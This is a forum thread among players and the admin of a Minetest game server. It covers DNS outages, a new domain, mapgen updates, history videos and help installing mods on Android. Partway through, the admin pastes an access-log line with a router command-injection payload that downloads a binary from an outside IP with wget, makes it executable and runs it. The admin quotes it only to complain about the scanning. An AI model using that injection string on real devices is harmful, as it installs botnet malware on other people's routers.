Thanks for the update, that would explain why I can't get my Enyekala fix!

Thanks for the heads up Dragon, was wondering until I came here. Haven't seen you about in ages, you haven't finished your builds yet! -____________-

I wonder if this has anything to do with the bug report I sent your ISP? They said (lit.) it opened a huge can of worms!

Just an ISP problem? Good. Started to wonder if the server's hardware had been bombed.

843jdc! Glad to see you around! (Here, at least...?)
I'll be honest: many of us started to wonder if the cats got you! :-)

Whilst we are waiting for wonderful things to happen to the server's internet connection, here is a tip: Eating mutton temporarily reduces certain types of damage. Eat well, mine well! Is that BBQ hot yet?

lol

hlqkj - One of Eve Online's alliances recruited me to help them take over and rule the galaxy. So I will be there until about November. Though I'll be looking in on the server occasionally.

Looks like the server is back in business! For several hours there it was a bit spotty. I couldn't even log in remotely although a few others managed to.

In other news, during the outage I am pretty sure I discovered a mapgen bug affecting vanilla Minetest, which only manifests if 'num_emerge_threads' is 0 (i.e., autodetect num cores). I might file a bug report, if someone more competent at bug reports doesn't do so first.

In further news, I will probably need to buy a high-capacity spinning HDD in the next 2-3 months. The backups continue to ... grow.

For those who have made an entry in their hosts file (or whatever way you may have used) to get around ongoing DNS issues, it looks like the IP address of the server has changed.

People are putting the IP in their hosts?

Eww.

In seriousness though, I've been hearing rumblings from various folks about DNS issues for a long time now. About half the time I couldn't even get the webpage from remote; I figured maybe the link was slow or apache was misconfigured. Seems I may be wrong: today I got a new domain from ClouDNS, and testing it, I can bring up the website much faster with the new domain than with the old.

And what's with this SSL thing my webbrowser keeps insisting on? Do I need these strange magics?

[Edit] It's http://arklegacy-server.net
The old address will continue to work, of course (it's free after all)

Yes. Not pretty, but it's been the only way for me to get a reliable connection as there have been ongoing DNS issues. I think others have done the same. I'll need to update a few "other" things with the new domain name now!

Need? Not at all! The website has nothing as sensitive as to justify that. The problem is that some browsers have started to enforce policies that automagically promote the connection to HTTPS, blocking their users (or making their lives a bit harder, depending on their skills) when they try to connect to a website that does not provide such a thing.

If you don't know it already, Let's Encrypt may help. (https://letsencrypt.org/ - note the s.)

Update to the Jarkati mapgen.

Not only is it now "doubleplusgood", but these extensive glowing crystalline structures can be found throughout the otherwise mostly-barren caverns. These crystals are NOT renewable, but they can be transmuted into something else ....

Just need lava, water, and an ore underneath.

Image
<UncleBob> Well, this white crystal can find itself
In other news, I gather from reading the chatlog that UncleBob met with a gang of flying menaces and was promptly kicked off a ledge. Adventures should note that this was an entirely unexpected development. Previously Jarkati had been relatively safe.
------------------------------------------------------------------

In further news, who is the creep that keeps sending me this GET request? *slap*
84.54.51.37 - - [11/Jun/2024:18:32:31 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.71.81%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 438 "-" "Go-http-client/1.1"

Unfortunately I can't, because I don't know anything about the Android environment or how to install stuff from its command line, and musttest_game needs a couple Lua packages installed this way. "networks" and "email" need an extra luarocks package (sql iirc), for instance.

I can decode the error message though. It says you need to disable mod security. However, an end-user should *never do this*, because if you install the wrong mod then your documents go bye-bye.

There's a few people who've got it working on PC, but it's not easy.

Ok now how I add "network" mod to trusted mod list?

You'll find the relevant options in https://github.com/minetest/minetest/bl ... nf.example

It's looking for 'lsqlite3' and can't find it. This is an external module for Lua, so, not part of Minetest. I have no idea how to install it on Android, you'll need to ask someone who knows.

Edit: I've always installed lsqlite3 on my machine(s) using LuaRocks. However, the website for LuaRocks doesn't explicitly mention support for Android at all. You're way outside my area of expertise.

UncleBob uploaded a HISTORY video! (see here: https://odysee.com/@Unboblievable:0/47-yandoa:7)

One thing not mentioned in the video, because it can only be seen from INSIDE the jail ...

Image
Image

The text is "sagalost: this gaol was designed specifically for your type."

--------------------------
Edit:

In other news, dungeons have received a little TLC. More chests, more options for loot, and more ways to die.

As I write this, I wonder if I should implement those nasty traps I once saw in a mod, called mummies I think ... It had desert pyramids.

Very entertaining video haha. Please continue this series UncleBob. :D

For anyone interested in what "basalt factory" means in the context of UncleBob's history video...

Here's what Extrem's base looked like after I remodeled:

Image

It's actually against the server rules to do this to other's builds, don't try this at home kids.
It's a good thing that Extrem's "base" doesn't count as a "build." ;)

Wow, this new Jarkati and Channelwood mapgen looks amazing. I just have to get enough courage (and coordination) to venture out again... and find more dungeons...

Thanks for the comments - more history videos planned, time permitting. Hmm, there's some unusual and hilarious things to find in Enyekala history!
